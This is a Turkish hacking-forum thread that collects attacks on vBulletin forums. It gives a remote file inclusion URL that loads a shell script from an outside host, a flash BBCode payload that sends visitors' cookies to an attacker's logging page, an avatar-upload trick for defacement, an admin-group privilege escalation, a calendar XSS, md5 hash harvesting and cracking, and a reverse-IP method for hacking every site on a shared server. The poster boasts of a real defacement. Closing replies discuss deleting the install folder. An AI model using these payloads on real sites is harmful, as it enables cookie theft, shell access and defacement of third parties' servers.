shutbox acıgı

<body><style type=text/css>table, p, td, tr{visibility:hidden;}body {background-color: #000000;background-image: url("http://onlineturk.on.funpic.de/index.jpg");}

ve konu ıcı tam sayfa resım doseme kodu

vbulletın grup acıgı

ßu yöntem tamamiyle site admınLerinin Salaklığından KaynakLanıyor ! ßazı VbuLLentin SiteLerde Üye GrupLarı Wardır ßu grupLarda YÖNETİCİ v€ya CO ADMIN Grupu Wardır ßazı Salak AdmınLer ßunu Kapatmayı Unutur iyKide UnutmuşLar Şimdi Yapıcağimiz iŞ VbuLLentin ßir Foruma Üye oLun Sonra KuLLancı PaneLıne Girin Orda Sağda Sekmeler Wardır Ne Yapmak Istediğinize göre Ayarlarsınız Oranın En Altında GRUP UYELİKLERİ War Oraya Girin Ve Daha Sonra Ordan YÖNETİCİ Grußuna üye oLun Ve Sistem Size Otomatık SMOD Yetkisi Wericek ßu yetkiyLe Siteye Duyuru EkliyebiLirsiniz + Forumdaki ßutun KonuLarı Silebilirsiniz. Anlamadığınız Yerleri Sorun ßen ßurdayım...

shell calıstırma kodu

bazı vb lerde oluyor ama eskı surumler dıkkatlı olsun

/application.php?base_path=http://onlineturk.on.funpic.de/cc.dat?

vbulletın xss acıgı (3.0.x)

Vbulletin 3.0.x sürümlerinde(3.0.0 .... 3.0.7) private.php deki
QUOTE:
$pm['title'] = htmlspecialchars_uni($pm['title']);
satırındaki hatadan dolayı cross site scripting açığı meydana gelmekte.
Şöyleki;
Özel mesaja girip yeni mesaj gönder dediğimizde
QUOTE:



scriptini yazıp preview post seçeneği(önizleme) ye bastığımızda karşımıza cookie bilgileri geliyor.

kodu yazamıyorum ızın yok

ayrıca 3.54 e aıt acık soyledır profıl resmı yuklemeden atıyorum bı ındexınız olsun uzantısını ındex.gif.php yapınca dosyayı upload edıp profıl resmı eklıyorsunuz buda bı defacedır ekledıkten sonra

www.site.com/forum/image.php?u=kullanıcı ıdı yazın ındexınız tam sayfa cıkar bu acık sadece 3.5.4 lerdedır

[flAsh=http://onlineturk.on.funpic.de/flAsh.swf]onmouseover='location.href="http://onlineturk.on.funpic.de/log.php?nm=Black-code.net&re=http://www.linux-soul.net/vb/showthread.php?t=1245&id="+document.Cookie'[/flAsh]




flash acık olan sıtelerde cookıe calma kodu vbulletın acıgıdır

http://antichat.ru/cgi-bin/s.jpg buna eklenen bı kodlada yapılan cookıe calma var ama ızın olmadıgından yazamıyorum
lutfen bu adresede tıklamayın kodu koyamıyorum ama tahmınen scrıpt kodlarıyla oldugunu anlarsınız sıtede kod yazımı engellı oldugundan veremıyorum daha buldukca buraya eklerım selametle

bı yontem daha tamamen bana aıttır bı tane serefsızlerın sıtesını bu yontemle ındırdık

yontem su ve hackledıgımız sıtede vbulletın 3.5.4 tu

buda ıspatı sebebı vardı onuda solıyım turk sıtesı ama kufur ettıklerı ıcın yaptık

http://www.zone-h.org/en/defacements/mirror/id=3657652/

http://whois.webhosting.info/sıtenın ıp adresı

yazıp serverdakı tum sıtelerı goruyorsunuz daha sonra ıclerınden acıgı cok olan php nuke veya asp sıte bulup acıkla shell ınızı sokup tum serverdakı sıtelerı hackleyebılırsınız.

Vulnerability:
--------------------
Html_Injection :
The software does not properly filter HTML tags in the title of events before being passed to user in 'calendar.php'&'reminder.php AS include'. that may allow a remote user to inject HTML/javascript codes to events of calendar. The hostile code may be rendered in the web browser of the victim user who will Request Reminder for those Events (persistent).
For example an attacker creates new event (Single-All Day Event , Ranged Event OR Recurring Event)with this content:

TITLE:--------->Testkod yazamıyorum
BODY:---------->No matter
OTHER OPTIONS:->No matter

The hostile code will be rendered in the web browser of the victim user who will Request Reminder for this Event via http://example.com/vbulletin/calenda...addreminder&e=[eventid]
The hostile code will originate from the site running the Vbulletin software and will run in the security context of that site. As a result, the code will be able to access the target user's cookies (including authentication cookies),or take actions on the site acting as the target user.

Demonstration XSS URL:
--------------------
http://example.com/vbulletin/calenda...addreminder&e=[kullanıcı ıstersenız admın ıdını yazın]

Solution:
--------------------
There is no vendor supplied patch for this issue at this time.

Credit :
--------------------
Discovered & released by trueend5 (trueend5 kapda ir)
Security Science Researchers Institute Of Iran
[http://www.KAPDA.ir]

yenı bı acık daha acıklayım az sıze

acık soyle calendar.php dekı olay hatırlatıcı yada takvımlerde html kodu kullanımı acıksa forumu ıstedıgınız sayfaya yonlendırırsınız elazıglı sana yapılan buydu kesın.

http://example.com/forum/calendar.php?do=addreminder&e=[kullanıcı ıstersenız admın ıdını yazın]

buraya gırın olmazsa su sekılde yapın


example.com/forum/calendar.php?

yaptıktan sonra olay ekleye gırın orda bı baslık secın sectıkten sonra meta tag kodu yada yonlendıme yada tam sayfa resım kodu koyun forum komple ıstedıgınız yere yonlenır.selametle

acık 3.5.2 ve 3.5.3 lerde mafıa scrıpt null versıyonundan dogan acıktır.

www.siteismi.com/sm-check.md5

siteismi.com yazan yere hedef siteyi yazıyouz ve acılan sayfada size md5leri veriyor.ve md5 ler zor kırılıyor,ama uğraşın md5 kıran site=http://www.milw0rm.com/cracker/info.php
burdan kırabilrseniz kırın kıramazsanız programlardan deneyin

Peki install klasörune nasıl şifre werecez?

Aynı açık avatar yüklemedede olurmu?

install klasörünü tamamen silin...bu zaten herzaman söylenen birşey..

ne şifresi yaws uçurun instalı

lisanssız sürümlerde bu tip açıklar olması doğaldır.. özellikle scriptmafia içine bitek kek malzemesi katmıyo forumun keyloggerden md5 hash ına kadar herşey var..

valla şimdiye kadar install klasörünü silin diye bi yazı okumadım gerekli olsaydı vb.com söylerdi zaten install/xxx.php yazsan bile lisans nosu soruyor.. iyiki almışık lisansı

sadece install.php 'yi silmek yeterli olmuyor. upgrade dosyaları da forumun hacklenmesi için yeterli. sonuç olarak mantıken install klasörünün ya silinmesi yada isminin değiştirilmesi şart !